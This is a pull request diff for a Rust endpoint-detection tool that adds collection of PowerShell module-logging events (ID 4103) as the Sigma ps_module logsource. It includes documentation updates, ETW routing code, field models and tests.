### PR TITLE
feat(windows-etw): collect PowerShell module logging as ps_module

### DIFF
--- a/docs/architecture.md
+++ b/docs/architecture.md
@@ -83,7 +83,7 @@ Log subscription for Service Control Manager event 7045. It currently covers:
 - File
 - Registry
 - DNS
-- PowerShell
+- PowerShell (script block and module logging)
 - WMI
 - Service creation
 - Task creation

--- a/docs/coverage.md
+++ b/docs/coverage.md
@@ -42,6 +42,15 @@ Dominated by two Event Log channels and a few Sysmon categories:
 | 17 | `windefend` |
 | 15 | `create_remote_thread` |
 
+**Since this measurement:** the 34 `ps_module` rules are no longer blocked.
+Event 4103 is collected from the PowerShell provider
+([#322](https://github.com/Karib0u/rustinel/issues/322)), and all 34 reference
+only `ContextInfo` and `Payload`, which the decoder populates — so they move to
+"can fire" (Windows 2,172 / 75.5%, blocked-on-collector 414 / 14.4%) once the
+host has Module Logging enabled. See
+[Detection](detection.md#powershell-logsources). The table itself is left as
+measured; the next full run will absorb it.
+
 ### Windows: unavailable fields (289 rules)
 
 The field is modelled but no sensor populates it:

--- a/docs/detection.md
+++ b/docs/detection.md
@@ -110,6 +110,7 @@ tracked by [#195](https://github.com/Karib0u/rustinel/issues/195).
 | `registry_event` / `registry_*` | Yes | No | No | Windows only |
 | `image_load` | Yes | No | No | Windows only |
 | `ps_script` | Yes | No | No | Windows only |
+| `ps_module` | Yes | No | No | Windows only, requires Module Logging policy, see below |
 | `wmi_event` | Yes | No | No | Windows only, see below |
 | `service_creation` | Yes | No | No | Windows only |
 | `task_creation` | Yes | No | No | Windows only |
@@ -173,6 +174,37 @@ For rule authors: `wmi_event` rules selecting on `EventID` do not match. Rules
 matching `Operation`, `Query`, `EventNamespace`, `Image`, `User`, or
 `DestinationHostname` do. WMI *persistence* telemetry is not collected at all.
 
+#### PowerShell logsources
+
+Both PowerShell families come from one provider,
+`Microsoft-Windows-PowerShell`, split by event ID:
+
+| Family | Event | Fields | Host policy required |
+| --- | --- | --- | --- |
+| `ps_script` | 4104 | `ScriptBlockText`, `ScriptBlockId`, `Path` | Script Block Logging, except for blocks Windows flags as suspicious |
+| `ps_module` | 4103 | `ContextInfo`, `Payload` | Module Logging, always |
+
+Module logging is **off by default**, and unlike script block logging it has no
+automatic path: with the policy disabled, PowerShell writes no 4103 at all, so
+`ps_module` rules see nothing however the session is configured. Enable **Turn
+on Module Logging** under *Windows Components > Windows PowerShell* in Group
+Policy, with module names set to `*`, or set the equivalent registry values:
+
+```powershell
+$key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging'
+New-Item -Path "$key\ModuleNames" -Force | Out-Null
+New-ItemProperty -Path $key -Name EnableModuleLogging -Value 1 -PropertyType DWord -Force
+New-ItemProperty -Path "$key\ModuleNames" -Name '*' -Value '*' -PropertyType String -Force
+```
+
+For rule authors: `ContextInfo` and `Payload` are free-form provider text, not
+parsed fields. `ContextInfo` is a newline-separated `name = value` block (host
+application, command name, user, shell ID) and `Payload` is the
+parameter-binding transcript. Windows writes **both in the host's display
+language**, so a rule that matches a label (`Host Application =`) rather than a
+value only fires on an English host. PowerShell 7 uses a different provider and
+is not collected.
+
 ### Field model
 
 Sigma evaluates the shared `NormalizedEvent` model using Sysmon-style field
@@ -186,6 +218,8 @@ names.
   `SourceFilename` on a rename and `PathTruncated`
 - **DNS:** Sysmon-style `QueryName` / `QueryResults` / `RecordType`, or the
   generic aliases `query`, `answer`, `record_type`
+- **PowerShell:** `ScriptBlockText`, `ScriptBlockId`, `Path` on `ps_script`;
+  `ContextInfo`, `Payload` on `ps_module`
 
 Per-platform process notes:
 

--- a/docs/limitations.md
+++ b/docs/limitations.md
@@ -77,8 +77,15 @@ platforms, but several Sysmon-style fields are unavailable.
 - **No injection, driver-load, or named-pipe visibility.** There is no
   equivalent of CreateRemoteThread, ProcessAccess, pipe, or driver-load
   telemetry, so injection-based TTPs leave little trace.
-- **PowerShell 7 (`pwsh`) is not covered.** Only Windows PowerShell 5.1
-  script-block telemetry is collected, and there is no module logging.
+- **PowerShell telemetry depends on host policy.** Only Windows PowerShell 5.1
+  is covered; PowerShell 7 (`pwsh`) uses a different provider and is not
+  collected. Script block logging (4104) reaches the sensor for suspicious
+  blocks even with the policy off, but module logging (4103) does not exist at
+  all until Module Logging is enabled on the host, so `ps_module` rules are
+  inert on a default install. `ContextInfo` and `Payload` are also written in
+  the host's display language, so rules matching English labels do not fire on
+  a localized host. See
+  [Detection](detection.md#powershell-logsources).
 - **DNS `RecordType` is always empty**, and there is no network data-volume
   telemetry, so exfil-by-volume heuristics are not expressible.
 

--- a/docs/output.md
+++ b/docs/output.md
@@ -127,6 +127,7 @@ Format:
 | DNS | `edr.dns` |
 | Image load | `edr.library` |
 | Scripting | `edr.scripting` |
+| PowerShell module | `edr.powershell_module` |
 | WMI | `edr.wmi` |
 | Service | `edr.service` |
 | Task | `edr.task` |

--- a/docs/troubleshooting.md
+++ b/docs/troubleshooting.md
@@ -243,6 +243,31 @@ Enable **Turn on PowerShell Script Block Logging** under **Windows Components >
 Windows PowerShell** in Group Policy when full script-block coverage is needed.
 PowerShell 7 uses a different provider and is not currently collected.
 
+### PowerShell module rules do not match on Windows
+
+`ps_module` rules read event 4103, which PowerShell emits **only** when Module
+Logging is enabled. There is no automatic path for it the way there is for
+suspicious script blocks: with the policy off, the event is never written, so
+no session setting can recover it.
+
+Check the effective policy from an elevated PowerShell:
+
+```powershell
+Get-ItemProperty `
+  HKLM:\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging `
+  -Name EnableModuleLogging
+Get-Item HKLM:\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging\ModuleNames
+```
+
+`EnableModuleLogging` must be `1` **and** `ModuleNames` must list the modules to
+log — set the value name and data both to `*` to cover everything. Enabling the
+policy alone, with an empty `ModuleNames`, logs nothing.
+
+If the policy is on and rules still do not match, check the rule against the
+host language: `ContextInfo` and `Payload` are written in the host's display
+language, so a rule matching an English label (`Host Application =`) does not
+fire on a localized host. See [Detection](detection.md#powershell-logsources).
+
 ### YARA did not scan the process I expected
 
 Check these first:

--- a/src/engine/alert.rs
+++ b/src/engine/alert.rs
@@ -569,6 +569,23 @@ impl Engine {
                     Some("ps_script"),
                 ));
             }
+            EventCategory::PowerShellModule => {
+                aliases.push(LogSourceKey::from_parts(
+                    Some("windows"),
+                    Some("powershell"),
+                    Some("ps_module"),
+                ));
+                aliases.push(LogSourceKey::from_parts(
+                    Some("windows"),
+                    Some("powershell-classic"),
+                    Some("ps_module"),
+                ));
+                aliases.push(LogSourceKey::from_parts(
+                    Some("windows"),
+                    Some("microsoft-windows-powershell"),
+                    Some("ps_module"),
+                ));
+            }
             EventCategory::Wmi => {
                 aliases.push(LogSourceKey::from_parts(
                     Some("windows"),

--- a/src/engine/logsource.rs
+++ b/src/engine/logsource.rs
@@ -175,6 +175,7 @@ impl Engine {
                 | "dns"
                 | "image_load"
                 | "ps_script"
+                | "ps_module"
                 | "wmi_event"
                 | "service_creation"
                 | "task_creation"
@@ -267,6 +268,17 @@ impl Engine {
                     Some("windows"),
                     Some("microsoft-windows-powershell"),
                     Some("ps_script"),
+                ),
+                LogSourceKey::from_parts(Some("windows"), Some("powershell"), Some("ps_module")),
+                LogSourceKey::from_parts(
+                    Some("windows"),
+                    Some("powershell-classic"),
+                    Some("ps_module"),
+                ),
+                LogSourceKey::from_parts(
+                    Some("windows"),
+                    Some("microsoft-windows-powershell"),
+                    Some("ps_module"),
                 ),
                 LogSourceKey::from_parts(Some("windows"), Some("wmi"), Some("wmi_event")),
                 LogSourceKey::from_parts(Some("windows"), Some("system"), Some("service_creation")),

--- a/src/models/ecs/alert.rs
+++ b/src/models/ecs/alert.rs
@@ -366,6 +366,18 @@ pub struct EcsAlert {
     )]
     pub edr_powershell_script_block_id: Option<String>,
 
+    #[serde(
+        rename = "edr.powershell.context_info",
+        skip_serializing_if = "Option::is_none"
+    )]
+    pub edr_powershell_context_info: Option<String>,
+
+    #[serde(
+        rename = "edr.powershell.payload",
+        skip_serializing_if = "Option::is_none"
+    )]
+    pub edr_powershell_payload: Option<String>,
+
     // ========================================================================
     // WMI Fields
     // ========================================================================

--- a/src/models/ecs/event.rs
+++ b/src/models/ecs/event.rs
@@ -20,6 +20,7 @@ pub(super) fn ecs_event_category(category: EventCategory) -> Vec<String> {
         EventCategory::Dns => vec!["network".to_string()],
         EventCategory::ImageLoad => vec!["library".to_string()],
         EventCategory::Scripting => vec!["process".to_string()],
+        EventCategory::PowerShellModule => vec!["process".to_string()],
         EventCategory::Wmi => vec!["api".to_string()],
         EventCategory::Service => vec!["configuration".to_string()],
         EventCategory::Task => vec!["configuration".to_string()],
@@ -49,6 +50,7 @@ pub(super) fn ecs_event_type(category: EventCategory, opcode: u8, event_id: u16)
         EventCategory::Dns => vec!["protocol".to_string()],
         EventCategory::ImageLoad => vec!["start".to_string()],
         EventCategory::Scripting => vec!["info".to_string()],
+        EventCategory::PowerShellModule => vec!["info".to_string()],
         EventCategory::Wmi => vec!["info".to_string()],
         EventCategory::Service => {
             if event_id == 7045 {
@@ -94,6 +96,7 @@ pub(super) fn ecs_event_action(
         EventCategory::Dns => "dns-query",
         EventCategory::ImageLoad => "image-load",
         EventCategory::Scripting => "powershell-script",
+        EventCategory::PowerShellModule => "powershell-module",
         EventCategory::Wmi => "wmi-operation",
         EventCategory::Service => {
             if event_id == 7045 {
@@ -122,6 +125,7 @@ pub(super) fn event_dataset(category: EventCategory) -> String {
         EventCategory::Dns => "dns",
         EventCategory::ImageLoad => "library",
         EventCategory::Scripting => "scripting",
+        EventCategory::PowerShellModule => "powershell_module",
         EventCategory::Wmi => "wmi",
         EventCategory::Service => "service",
         EventCategory::Task => "task",

--- a/src/models/ecs/mod.rs
+++ b/src/models/ecs/mod.rs
@@ -120,6 +120,8 @@ impl From<&Alert> for EcsAlert {
             edr_task_user_name: None,
             edr_powershell_script_block_text: None,
             edr_powershell_script_block_id: None,
+            edr_powershell_context_info: None,
+            edr_powershell_payload: None,
             edr_wmi_operation: None,
             edr_wmi_query: None,
             edr_wmi_namespace: None,
@@ -235,6 +237,13 @@ impl From<&Alert> for EcsAlert {
                 ecs.file_path = f.path.clone();
                 ecs.edr_powershell_script_block_text = f.script_block_text.clone();
                 ecs.edr_powershell_script_block_id = f.script_block_id.clone();
+            }
+            EventFields::PowerShellModule(f) => {
+                ecs.process_executable = f.image.clone();
+                ecs.process_pid = parse_u64(&f.process_id);
+                apply_user_fields(&mut ecs, f.user.as_deref());
+                ecs.edr_powershell_context_info = f.context_info.clone();
+                ecs.edr_powershell_payload = f.payload.clone();
             }
             EventFields::WmiEvent(f) => {
                 ecs.process_executable = f.image.clone();

--- a/src/models/event.rs
+++ b/src/models/event.rs
@@ -219,6 +219,14 @@ impl NormalizedEvent {
                 "User" => f.user.as_deref(),
                 _ => None,
             },
+            EventFields::PowerShellModule(f) => match key {
+                "ContextInfo" => f.context_info.as_deref(),
+                "Payload" => f.payload.as_deref(),
+                "ProcessId" => f.process_id.as_deref(),
+                "Image" => f.image.as_deref(),
+                "User" => f.user.as_deref(),
+                _ => None,
+            },
             EventFields::RemoteThread(f) => match key {
                 "SourceProcessId" => f.source_process_id.as_deref(),
                 "SourceImage" => f.source_image.as_deref(),
@@ -450,6 +458,23 @@ impl NormalizedEvent {
                     values.push(v.as_str());
                 }
                 if let Some(v) = &f.path {
+                    values.push(v.as_str());
+                }
+                if let Some(v) = &f.image {
+                    values.push(v.as_str());
+                }
+                if let Some(v) = &f.user {
+                    values.push(v.as_str());
+                }
+                if let Some(v) = &f.process_id {
+                    values.push(v.as_str());
+                }
+            }
+            EventFields::PowerShellModule(f) => {
+                if let Some(v) = &f.context_info {
+                    values.push(v.as_str());
+                }
+                if let Some(v) = &f.payload {
                     values.push(v.as_str());
                 }
                 if let Some(v) = &f.image {
@@ -759,6 +784,23 @@ impl NormalizedEvent {
                     values.push(("ProcessId", v.as_str()));
                 }
             }
+            EventFields::PowerShellModule(f) => {
+                if let Some(v) = &f.context_info {
+                    values.push(("ContextInfo", v.as_str()));
+                }
+                if let Some(v) = &f.payload {
+                    values.push(("Payload", v.as_str()));
+                }
+                if let Some(v) = &f.image {
+                    values.push(("Image", v.as_str()));
+                }
+                if let Some(v) = &f.user {
+                    values.push(("User", v.as_str()));
+                }
+                if let Some(v) = &f.process_id {
+                    values.push(("ProcessId", v.as_str()));
+                }
+            }
             EventFields::PowerShellScript(f) => {
                 if let Some(v) = &f.script_block_text {
                     values.push(("ScriptBlockText", v.as_str()));
@@ -898,6 +940,7 @@ pub enum EventCategory {
     Dns,
     ImageLoad,
     Scripting,
+    PowerShellModule,
     Wmi,
     Service,
     Task,
@@ -1050,6 +1093,9 @@ mod round_trip_tests {
             }),
             (EventCategory::Scripting, "Image", |f| {
                 matches!(f, EventFields::PowerShellScript(_))
+            }),
+            (EventCategory::PowerShellModule, "Image", |f| {
+                matches!(f, EventFields::PowerShellModule(_))
             }),
             (EventCategory::Wmi, "Image", |f| {
                 matches!(f, EventFields::WmiEvent(_))

--- a/src/models/fields.rs
+++ b/src/models/fields.rs
@@ -20,6 +20,7 @@ pub enum EventFields {
     DnsQuery(DnsQueryFields),
     ImageLoad(ImageLoadFields),
     PowerShellScript(PowerShellScriptFields),
+    PowerShellModule(PowerShellModuleFields),
     RemoteThread(RemoteThreadFields),
     WmiEvent(WmiEventFields),
     ServiceCreation(ServiceCreationFields),
@@ -52,6 +53,9 @@ impl EventFields {
             EventCategory::Dns => serde_json::from_value(payload).map(Self::DnsQuery),
             EventCategory::ImageLoad => serde_json::from_value(payload).map(Self::ImageLoad),
             EventCategory::Scripting => serde_json::from_value(payload).map(Self::PowerShellScript),
+            EventCategory::PowerShellModule => {
+                serde_json::from_value(payload).map(Self::PowerShellModule)
+            }
             EventCategory::Wmi => serde_json::from_value(payload).map(Self::WmiEvent),
             EventCategory::Service => serde_json::from_value(payload).map(Self::ServiceCreation),
             EventCategory::Task => serde_json::from_value(payload).map(Self::TaskCreation),
@@ -272,6 +276,32 @@ pub struct PowerShellScriptFields {
 
     #[serde(rename = "Path", skip_serializing_if = "Option::is_none")]
     pub path: Option<String>,
+
+    #[serde(rename = "ProcessId", skip_serializing_if = "Option::is_none")]
+    pub process_id: Option<String>,
+
+    #[serde(rename = "Image", skip_serializing_if = "Option::is_none")]
+    pub image: Option<String>,
+
+    #[serde(rename = "User", skip_serializing_if = "Option::is_none")]
+    pub user: Option<String>,
+}
+
+/// PowerShell module logging event fields (Sigma: ps_module)
+///
+/// `ContextInfo` and `Payload` are the two fields the `ps_module` rule family
+/// reads. Both are the provider's own free-form text: `ContextInfo` is a
+/// newline-separated `name = value` block (host application, command name,
+/// user), and `Payload` is the parameter-binding transcript. Windows writes
+/// both in the host's display language, so a rule that matches on the label
+/// rather than the value only fires on an English host.
+#[derive(Debug, Clone, Serialize, Deserialize)]
+pub struct PowerShellModuleFields {
+    #[serde(rename = "ContextInfo", skip_serializing_if = "Option::is_none")]
+    pub context_info: Option<String>,
+
+    #[serde(rename = "Payload", skip_serializing_if = "Option::is_none")]
+    pub payload: Option<String>,
 
     #[serde(rename = "ProcessId", skip_serializing_if = "Option::is_none")]
     pub process_id: Option<String>,

--- a/src/normalizer/mod.rs
+++ b/src/normalizer/mod.rs
@@ -52,6 +52,9 @@ impl Normalizer {
             SensorPayload::Registry(fields) => self.normalize_registry(event, fields.clone()),
             SensorPayload::ImageLoad(fields) => self.normalize_image_load(fields.clone()),
             SensorPayload::Scripting(fields) => self.normalize_powershell(fields.clone()),
+            SensorPayload::PowerShellModule(fields) => {
+                self.normalize_powershell_module(fields.clone())
+            }
             SensorPayload::Wmi(fields) => self.normalize_wmi(fields.clone()),
             SensorPayload::Service(fields) => self.normalize_service(event, fields.clone()),
             SensorPayload::Task(fields) => self.normalize_task(event, fields.clone()),
@@ -277,6 +280,14 @@ impl Normalizer {
         Some(EventFields::PowerShellScript(fields))
     }
 
+    fn normalize_powershell_module(
+        &self,
+        mut fields: PowerShellModuleFields,
+    ) -> Option<EventFields> {
+        self.resolve_user_field(&mut fields.user);
+        Some(EventFields::PowerShellModule(fields))
+    }
+
     fn normalize_wmi(&self, mut fields: WmiEventFields) -> Option<EventFields> {
         self.resolve_user_field(&mut fields.user);
         Some(EventFields::WmiEvent(fields))
@@ -351,6 +362,7 @@ impl Normalizer {
             EventFields::DnsQuery(f) => f.process_id.as_deref(),
             EventFields::ImageLoad(f) => f.process_id.as_deref(),
             EventFields::PowerShellScript(f) => f.process_id.as_deref(),
+            EventFields::PowerShellModule(f) => f.process_id.as_deref(),
             EventFields::WmiEvent(f) => f.process_id.as_deref(),
             EventFields::ServiceCreation(f) => f.process_id.as_deref(),
             EventFields::TaskCreation(f) => f.process_id.as_deref(),

--- a/src/response/mod.rs
+++ b/src/response/mod.rs
@@ -436,6 +436,10 @@ fn extract_process_info(alert: &Alert) -> (Option<u32>, Option<String>) {
             pid = parse_pid(f.process_id.as_deref());
             image = f.image.clone();
         }
+        EventFields::PowerShellModule(f) => {
+            pid = parse_pid(f.process_id.as_deref());
+            image = f.image.clone();
+        }
         EventFields::WmiEvent(f) => {
             pid = parse_pid(f.process_id.as_deref());
             image = f.image.clone();

--- a/src/sensor/mod.rs
+++ b/src/sensor/mod.rs
@@ -23,8 +23,8 @@ use tokio::sync::mpsc::Sender;
 
 use crate::models::{
     DnsQueryFields, EventCategory, EventFields, FileEventFields, ImageLoadFields,
-    NetworkConnectionFields, PowerShellScriptFields, ProcessCreationFields, RegistryEventFields,
-    ServiceCreationFields, TaskCreationFields, WmiEventFields,
+    NetworkConnectionFields, PowerShellModuleFields, PowerShellScriptFields, ProcessCreationFields,
+    RegistryEventFields, ServiceCreationFields, TaskCreationFields, WmiEventFields,
 };
 
 /// Cross-platform sensor interface.
@@ -238,6 +238,7 @@ pub enum SensorPayload {
     Registry(RegistryEventFields),
     ImageLoad(ImageLoadFields),
     Scripting(PowerShellScriptFields),
+    PowerShellModule(PowerShellModuleFields),
     Wmi(WmiEventFields),
     Service(ServiceCreationFields),
     Task(TaskCreationFields),
@@ -254,6 +255,7 @@ impl SensorPayload {
             Self::Registry(_) => EventCategory::Registry,
             Self::ImageLoad(_) => EventCategory::ImageLoad,
             Self::Scripting(_) => EventCategory::Scripting,
+            Self::PowerShellModule(_) => EventCategory::PowerShellModule,
             Self::Wmi(_) => EventCategory::Wmi,
             Self::Service(_) => EventCategory::Service,
             Self::Task(_) => EventCategory::Task,
@@ -271,6 +273,7 @@ impl SensorPayload {
             Self::Registry(fields) => EventFields::RegistryEvent(fields),
             Self::ImageLoad(fields) => EventFields::ImageLoad(fields),
             Self::Scripting(fields) => EventFields::PowerShellScript(fields),
+            Self::PowerShellModule(fields) => EventFields::PowerShellModule(fields),
             Self::Wmi(fields) => EventFields::WmiEvent(fields),
             Self::Service(fields) => EventFields::ServiceCreation(fields),
             Self::Task(fields) => EventFields::TaskCreation(fields),
@@ -290,6 +293,7 @@ impl TryFrom<EventFields> for SensorPayload {
             EventFields::RegistryEvent(fields) => Ok(Self::Registry(fields)),
             EventFields::ImageLoad(fields) => Ok(Self::ImageLoad(fields)),
             EventFields::PowerShellScript(fields) => Ok(Self::Scripting(fields)),
+            EventFields::PowerShellModule(fields) => Ok(Self::PowerShellModule(fields)),
             EventFields::WmiEvent(fields) => Ok(Self::Wmi(fields)),
             EventFields::ServiceCreation(fields) => Ok(Self::Service(fields)),
             EventFields::TaskCreation(fields) => Ok(Self::Task(fields)),

--- a/src/sensor/windows/etw.rs
+++ b/src/sensor/windows/etw.rs
@@ -15,8 +15,8 @@ use tracing::{info, trace, warn};
 
 use crate::models::{
     DnsQueryFields, EventCategory, FileEventFields, ImageLoadFields, NetworkConnectionFields,
-    PowerShellScriptFields, ProcessCreationFields, RegistryEventFields, TaskCreationFields,
-    WmiEventFields,
+    PowerShellModuleFields, PowerShellScriptFields, ProcessCreationFields, RegistryEventFields,
+    TaskCreationFields, WmiEventFields,
 };
 use crate::sensor::network_events::{
     classify_kernel_network_event, decode_etw_ipv4, decode_etw_port, NetworkAddressFamily,
@@ -171,8 +171,21 @@ impl EtwProviders {
     // filters then keep lifecycle and diagnostic records out of the session.
     const OPERATIONAL_KEYWORD: u64 = 0x8000_0000_0000_0000;
     const POWERSHELL_RUNSPACE_KEYWORD: u64 = 0x0000_0000_0000_0001;
+    /// Module logging (4103) is published under `Cmdlets`, not `Runspace`:
+    /// the manifest gives 4103 a keyword mask of `0x8000_0000_0000_0020` and
+    /// 4104 one of `0x8000_0000_0000_0001`, and a session that asks for
+    /// `Runspace` alone is never sent the module events at all. The event ID
+    /// filter below is what keeps the rest of the `Cmdlets` traffic — the
+    /// analytic command-lifecycle events, tens per interpreter run — out of
+    /// the session buffers.
+    const POWERSHELL_CMDLETS_KEYWORD: u64 = 0x0000_0000_0000_0020;
+    const POWERSHELL_KEYWORDS: u64 =
+        Self::POWERSHELL_RUNSPACE_KEYWORD | Self::POWERSHELL_CMDLETS_KEYWORD;
     const DNS_EVENT_IDS: &'static [u16] = &[3006, 3008];
-    const POWERSHELL_EVENT_IDS: &'static [u16] = &[4104];
+    const POWERSHELL_EVENT_IDS: &'static [u16] = &[
+        POWERSHELL_EVENT_MODULE_LOGGING,
+        POWERSHELL_EVENT_SCRIPT_BLOCK,
+    ];
     // Native WMI-Activity numbering is unrelated to Sysmon's, but both reach
     // the engine under `(windows, wmi, wmi_event)`, so any collected ID that
     // happens to equal a Sysmon `wmi_event` ID (19 = filter, 20 = consumer,
@@ -237,9 +250,11 @@ impl EtwProviders {
         EtwProvider {
             guid: GUID::from(Self::POWERSHELL_GUID),
             name: "Microsoft-Windows-PowerShell",
-            // Script-block event 4104 is Verbose in the provider manifest.
+            // Script-block event 4104 is Verbose in the provider manifest;
+            // module-logging event 4103 is Informational. An ETW level is a
+            // ceiling, so Verbose collects both.
             level: 5,
-            keywords: Self::POWERSHELL_RUNSPACE_KEYWORD,
+            keywords: Self::POWERSHELL_KEYWORDS,
             event_ids: Self::POWERSHELL_EVENT_IDS,
         }
     }
@@ -287,6 +302,29 @@ impl EtwProviders {
 /// for free. Kept in sync with `kernel_file_route` by
 /// `filter_matches_routing_allowlist`; a drift would silently delete detections.
 const KERNEL_FILE_ROUTED_EVENT_IDS: [u16; 9] = [10, 11, 12, 14, 16, 17, 26, 27, 28];
+
+/// Microsoft-Windows-PowerShell manifest event IDs.
+///
+/// The two carry different Sigma logsources — 4104 is `ps_script`, 4103 is
+/// `ps_module` — and different templates, so they are routed apart before
+/// decoding rather than sharing one PowerShell payload.
+const POWERSHELL_EVENT_MODULE_LOGGING: u16 = 4103;
+const POWERSHELL_EVENT_SCRIPT_BLOCK: u16 = 4104;
+
+/// One provider, two Sigma logsources: the event ID is the only thing that
+/// separates script block logging from module logging, so the PowerShell
+/// provider cannot be routed on its GUID like the others. Kept in sync with
+/// [`EtwProviders::POWERSHELL_EVENT_IDS`] by
+/// `powershell_filter_matches_routing_allowlist`.
+fn powershell_route(event_id: u16) -> Option<(EventCategory, SensorAction)> {
+    match event_id {
+        POWERSHELL_EVENT_SCRIPT_BLOCK => Some((EventCategory::Scripting, SensorAction::Execute)),
+        POWERSHELL_EVENT_MODULE_LOGGING => {
+            Some((EventCategory::PowerShellModule, SensorAction::Execute))
+        }
+        _ => None,
+    }
+}
 
 /// Microsoft-Windows-Kernel-File manifest event IDs.
 const KERNEL_FILE_EVENT_NAME_CREATE: u16 = 10;
@@ -579,6 +617,7 @@ struct EtwRouting {
     kernel_process_guid: GUID,
     kernel_file_guid: GUID,
     kernel_registry_guid: GUID,
+    powershell_guid: GUID,
     guid_to_category: HashMap<GUID, EventCategory>,
 }
 
@@ -592,7 +631,6 @@ impl EtwRouting {
             EventCategory::Registry,
         );
         guid_to_category.insert(EtwProviders::dns_client().guid, EventCategory::Dns);
-        guid_to_category.insert(EtwProviders::powershell().guid, EventCategory::Scripting);
         guid_to_category.insert(EtwProviders::wmi_activity().guid, EventCategory::Wmi);
         guid_to_category.insert(EtwProviders::task_scheduler().guid, EventCategory::Task);
 
@@ -600,6 +638,7 @@ impl EtwRouting {
             kernel_process_guid: EtwProviders::kernel_process().guid,
             kernel_file_guid: EtwProviders::kernel_file().guid,
             kernel_registry_guid: EtwProviders::kernel_registry().guid,
+            powershell_guid: EtwProviders::powershell().guid,
             guid_to_category,
         }
     }
@@ -616,6 +655,10 @@ impl EtwRouting {
             };
         }
 
+        if provider_guid == self.powershell_guid {
+            return powershell_route(record.event_id());
+        }
+
         let category = *self.guid_to_category.get(&provider_guid)?;
         let action = match category {
             EventCategory::Network => {
@@ -628,11 +671,13 @@ impl EtwRouting {
             // pipeline; `decode_record` diverts it before reaching here.
             EventCategory::Registry => return None,
             EventCategory::Dns => SensorAction::Query,
-            EventCategory::Scripting => SensorAction::Execute,
             EventCategory::Wmi => SensorAction::Execute,
             EventCategory::Task => SensorAction::Register,
             EventCategory::Service => unreachable!("service events use the event log source"),
-            EventCategory::Process | EventCategory::ImageLoad => unreachable!(),
+            EventCategory::Process
+            | EventCategory::ImageLoad
+            | EventCategory::Scripting
+            | EventCategory::PowerShellModule => unreachable!(),
         };
 
         Some((category, action))
@@ -876,6 +921,7 @@ fn decode_record(
         EventCategory::Dns => decode_dns(&parser, record),
         EventCategory::ImageLoad => decode_image_load(&parser, record),
         EventCategory::Scripting => decode_powershell(&parser, record),
+        EventCategory::PowerShellModule => decode_powershell_module(&parser, record),
         EventCategory::Wmi => decode_wmi(&parser, record),
         EventCategory::Service => unreachable!("service events use the event log source"),
         EventCategory::Task => decode_task(&parser, record),
@@ -916,6 +962,13 @@ fn has_matchable_fields(payload: &SensorPayload) -> bool {
             fields.script_block_text.is_some()
                 || fields.script_block_id.is_some()
                 || fields.path.is_some()
+                || fields.process_id.is_some()
+                || fields.image.is_some()
+                || fields.user.is_some()
+        }
+        SensorPayload::PowerShellModule(fields) => {
+            fields.context_info.is_some()
+                || fields.payload.is_some()
                 || fields.process_id.is_some()
                 || fields.image.is_some()
                 || fields.user.is_some()
@@ -1444,6 +1497,24 @@ fn decode_powershell(parser: &Parser, record: &EventRecord) -> Option<DecodedEtw
     })
 }
 
+fn decode_powershell_module(parser: &Parser, record: &EventRecord) -> Option<DecodedEtwEvent> {
+    let mappings = field_maps::powershell_module_mappings();
+    let fields = PowerShellModuleFields {
+        context_info: try_get_string(parser, mappings.get_etw_field("ContextInfo")?),
+        payload: try_get_string(parser, mappings.get_etw_field("Payload")?),
+        process_id: try_get_uint(parser, mappings.get_etw_field("ProcessId")?),
+        image: try_get_string(parser, mappings.get_etw_field("Image")?)
+            .map(|path| convert_nt_to_dos(&path)),
+        user: try_get_string(parser, mappings.get_etw_field("User")?),
+    };
+
+    Some(DecodedEtwEvent {
+        pid: parse_optional_u32(fields.process_id.as_deref()).or(Some(record.process_id())),
+        process_start_key: None,
+        payload: SensorPayload::PowerShellModule(fields),
+    })
+}
+
 fn decode_wmi(parser: &Parser, record: &EventRecord) -> Option<DecodedEtwEvent> {
     let mappings = field_maps::wmi_event_mappings();
     let fields = WmiEventFields {
@@ -1824,17 +1895,52 @@ mod tests {
         assert_eq!(dns.event_ids, &[3006, 3008]);
 
         let powershell = EtwProviders::powershell();
-        assert_eq!(
-            powershell.keywords,
-            EtwProviders::POWERSHELL_RUNSPACE_KEYWORD
+        // Both keywords are required: 4104 is published under `Runspace` and
+        // 4103 under `Cmdlets`, so dropping either silently removes a whole
+        // Sigma logsource from the sensor.
+        assert_ne!(
+            powershell.keywords & EtwProviders::POWERSHELL_RUNSPACE_KEYWORD,
+            0
+        );
+        assert_ne!(
+            powershell.keywords & EtwProviders::POWERSHELL_CMDLETS_KEYWORD,
+            0
         );
         assert_eq!(powershell.level, 5);
-        assert_eq!(powershell.event_ids, &[4104]);
+        assert_eq!(powershell.event_ids, &[4103, 4104]);
 
         assert_eq!(EtwProviders::task_scheduler().event_ids, &[106]);
         assert!(!EtwProviders::WMI_EVENT_IDS.contains(&3));
         assert!(!EtwProviders::WMI_EVENT_IDS.contains(&13));
         assert!(!EtwProviders::WMI_EVENT_IDS.contains(&18));
+    }
+
+    #[test]
+    fn powershell_filter_matches_routing_allowlist() {
+        // A provider filter and a router that disagree fail silently: an ID in
+        // the filter but not the router is decoded work thrown away, and an ID
+        // in the router but not the filter never reaches the session at all.
+        for &event_id in EtwProviders::POWERSHELL_EVENT_IDS {
+            assert!(
+                powershell_route(event_id).is_some(),
+                "event {event_id} is subscribed but not routed"
+            );
+        }
+
+        assert_eq!(
+            powershell_route(POWERSHELL_EVENT_SCRIPT_BLOCK),
+            Some((EventCategory::Scripting, SensorAction::Execute)),
+            "script block logging must stay on ps_script"
+        );
+        assert_eq!(
+            powershell_route(POWERSHELL_EVENT_MODULE_LOGGING),
+            Some((EventCategory::PowerShellModule, SensorAction::Execute)),
+            "module logging must reach ps_module, not ps_script"
+        );
+        // 4105/4106 (script block start/stop) share the Runspace keyword and
+        // carry no matchable text.
+        assert_eq!(powershell_route(4105), None);
+        assert_eq!(powershell_route(4106), None);
     }
 
     #[test]
@@ -1874,5 +1980,23 @@ mod tests {
             user: None,
         });
         assert!(has_matchable_fields(&populated));
+
+        let empty_module = SensorPayload::PowerShellModule(PowerShellModuleFields {
+            context_info: None,
+            payload: None,
+            process_id: None,
+            image: None,
+            user: None,
+        });
+        assert!(!has_matchable_fields(&empty_module));
+
+        let populated_module = SensorPayload::PowerShellModule(PowerShellModuleFields {
+            context_info: Some("Host Application = powershell.exe".to_string()),
+            payload: None,
+            process_id: None,
+            image: None,
+            user: None,
+        });
+        assert!(has_matchable_fields(&populated_module));
     }
 }

--- a/src/sensor/windows/field_maps.rs
